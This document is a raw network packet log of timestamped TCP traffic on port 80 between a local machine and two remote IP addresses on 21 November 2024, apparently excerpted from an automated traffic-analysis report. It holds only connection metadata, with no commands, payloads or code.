                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.926505089 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.926551104 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.926615953 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.926657915 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.928358078 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.928415060 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.928488016 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.928534985 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.930166006 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.930221081 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.930236101 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.930273056 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.931890965 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.931956053 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.932013035 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.932063103 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.933607101 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.933670998 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.933717012 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.933779001 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.935395956 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.935458899 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.935503960 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.935554028 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.937199116 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.937271118 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.937273979 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.937315941 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.938987970 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.939053059 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.939100027 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.939148903 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.940715075 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.940785885 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.940850973 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.940901995 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.942477942 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.942570925 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.942595959 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.942673922 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.944355011 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.944422007 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.944473982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.944524050 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.946527958 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.946547985 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.946590900 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.946623087 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.947798967 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.947865963 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.947912931 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.947962999 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.949611902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.949666977 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.949753046 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.949804068 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.951378107 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.951431990 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.951518059 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.951565981 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.953157902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.953212976 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.953283072 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.953340054 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.954922915 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.954972982 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.955041885 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.955091000 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.956686974 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.956764936 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.956806898 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.956855059 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.958494902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.958574057 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.958628893 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.958678961 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.960304976 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.960374117 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.960438967 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.960506916 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.962034941 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.962090969 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.962141037 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.962196112 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.963820934 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.963891983 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.963943958 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.963994980 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.965656042 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.965717077 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.965799093 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.965851068 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.967330933 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.967405081 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.026392937 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.026483059 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.026659966 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.027782917 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.028384924 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.028426886 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.028485060 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.031477928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.031533957 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.031580925 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.034558058 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.034603119 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.034658909 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.037524939 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.037574053 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.037600994 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.040492058 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.040545940 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.040611982 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.043456078 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.043502092 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.043555021 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.046504974 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.046516895 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.046571970 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.047676086 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.047763109 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.047781944 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.047842979 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.048574924 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.048619032 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.048677921 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.048727036 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.049443007 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.049490929 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.049527884 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.050363064 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.050410032 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.050458908 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.050499916 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.052129030 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.052175045 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.052400112 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.052437067 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.052525997 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.055444956 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.055484056 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.055495977 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.058386087 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.058427095 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.058434010 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.061361074 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.061404943 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.061526060 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.064337969 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.064390898 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.064529896 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.067362070 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.067415953 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.067442894 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.070439100 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.070481062 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.070581913 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.073400974 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.073441982 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.073498011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.076296091 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.076340914 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.076406002 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.079278946 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.079334974 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.079369068 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.082288027 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.082338095 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.082401037 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.084287882 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.084326982 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.084331989 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.084367990 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.084923983 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.084959984 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.085036993 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.085071087 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.085242033 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.085278034 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.085527897 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.086230993 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.086270094 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.086426973 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.086462975 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.087583065 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.087619066 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.087697983 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.087733030 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.088191032 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.088227034 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.088320971 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.088989019 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.089023113 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.089096069 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.089131117 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.090260029 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.090302944 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.090444088 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.090477943 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091221094 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091262102 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091337919 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091583014 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091629028 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091703892 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.091739893 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.092989922 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.093025923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.093055964 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.093091011 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094540119 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094551086 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094562054 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094573975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094578981 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094597101 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.094621897 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.095570087 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.095604897 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.096189976 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.096227884 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097165108 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097174883 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097186089 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097201109 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097213984 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097243071 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.097300053 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.098283052 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.098318100 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.098393917 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.098429918 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100109100 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100147009 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100157976 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100163937 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100176096 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100204945 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.100282907 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.101130009 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.101140976 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.101176977 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.102407932 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.102447987 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.102478027 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.102519989 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103391886 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103430986 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103465080 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103740931 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103751898 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103776932 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.103789091 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.104926109 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.104964018 CET4980280192.168.2.4185.215.113.16
